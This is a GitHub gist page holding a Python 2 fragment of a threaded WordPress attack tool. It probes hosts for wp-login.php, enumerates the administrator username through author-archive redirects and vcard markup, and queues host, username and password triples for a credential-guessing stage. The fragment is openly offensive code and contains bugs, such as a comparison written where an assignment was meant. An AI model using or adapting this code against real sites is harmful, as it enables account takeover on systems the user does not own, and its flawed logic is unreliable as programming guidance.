-
-
Save likewhoa/8295082 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| queue = Queue.Queue() | |
| out_queue = Queue.Queue() | |
| class ThreadUrl(threading.Thread): | |
| """Threaded Url Grab""" | |
| def __init__(self, queue, out_queue): | |
| threading.Thread.__init__(self) | |
| self.queue = queue | |
| self.out_queue = out_queue | |
| def run(self): | |
| while True: | |
| #grabs host,passwords from queue | |
| host,passwords = self.queue.get() | |
| try: | |
| r=requests.get(host+"/wp-login.php",allow_redirects=False,timeout=30) | |
| if r.status_code==200: | |
| try: | |
| #get admin | |
| r2=requests.get(host+"/?author=1") | |
| match301=re.search(r"301",str(r2.history)) | |
| if match301: | |
| try: | |
| matchadmin=re.search("\/(\w+)\/$",r2.url) | |
| if matchadmin: | |
| myadmin=matchadmin.group(1) | |
| except Exception ,e: | |
| pass | |
| except: | |
| pass | |
| else: | |
| matchvcard2=re.search(r'vcard"><a.*?>(\w+)<\/a>',r2.text)# i think the 'r2.txt' is the question | |
| if matchvcard2: | |
| myadmin=matchvcard2.group(1) | |
| else: | |
| r3=requests.get(host+"/?author=2") | |
| matchvcard3=re.search(r'vcard"><a.*?>(\w+)<\/a>',r3.text)# i think the 'r3.txt' is the question | |
| if matchvcard3: | |
| myadmin=matchvcard3.group(1) | |
| else: | |
| pass | |
| if myadmin=='':#if cannnot get the user then user eq 'admin' | |
| myadmin=='admin' | |
| for password in passwords: | |
| self.out_queue.put((host,myadmin,password)) | |
| else: | |
| print "%s[-]%s not wp%s"%(BLUE,host,BRED) | |
| except Exception as e: | |
| print host,e | |
| #signals to queue job is done | |
| self.queue.task_done() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment